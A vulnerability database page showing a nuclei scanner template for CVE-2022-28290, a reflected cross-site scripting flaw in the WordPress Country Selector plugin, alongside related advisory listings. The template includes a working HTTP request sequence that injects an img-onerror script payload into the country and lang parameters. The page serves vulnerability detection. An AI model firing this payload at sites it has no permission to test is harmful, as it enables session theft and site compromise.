Lucene search
K

WordPress Country Selector <1.6.6 - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

WordPress Country Selector <1.6.6 - Cross-Site Scripting vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-28290
25 Apr 202217:15
attackerkb
Circl
CVE-2022-28290
25 Apr 202220:42
circl
CNNVD
WordPress plugin Country Selector 跨站脚本漏洞
25 Apr 202200:00
cnnvd
CNVD
WordPress Country Selector Plugin跨站脚本漏洞
26 Apr 202200:00
cnvd
CVE
CVE-2022-28290
25 Apr 202216:31
cve
Cvelist
CVE-2022-28290
25 Apr 202216:31
cvelist
EUVD
EUVD-2022-32742
3 Oct 202520:07
euvd
NVD
CVE-2022-28290
25 Apr 202217:15
nvd
OSV
CVE-2022-28290
25 Apr 202217:15
osv
Patchstack
WordPress Country Selector premium plugin <= 1.6.5 - Reflected Cross-Site Scripting (XSS) vulnerability
20 Apr 202200:00
patchstack
Rows per page
id: CVE-2022-28290

info:
  name: WordPress Country Selector <1.6.6 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: |
    WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update WordPress Country Selector plugin to version 1.6.6 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479
    - https://cybersecurityworks.com/zerodays/cve-2022-28290-reflected-cross-site-scripting-in-welaunch.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28290
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-28290
    cwe-id: CWE-79
    epss-score: 0.01409
    epss-percentile: 0.69274
    cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: welaunch
    product: wordpress_country_selector
    framework: wordpress
  tags: cve,cve2022,wordpress-country-selector,wpscan,wp,wordpress,wp-plugin,xss,welaunch,vuln,vkev

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        country=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US

    skip-variables-check: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(document.domain)>'
          - 'country_selector_'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f46bf83e2bffef0180c2ad5b4fedc0bfa0bcd760d47a0ea25f2dd49c9a6b4f99022100f620f51fd668e7f0907c89283384b18231dacb70f659b59190d8351c4fd13888:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.01409
23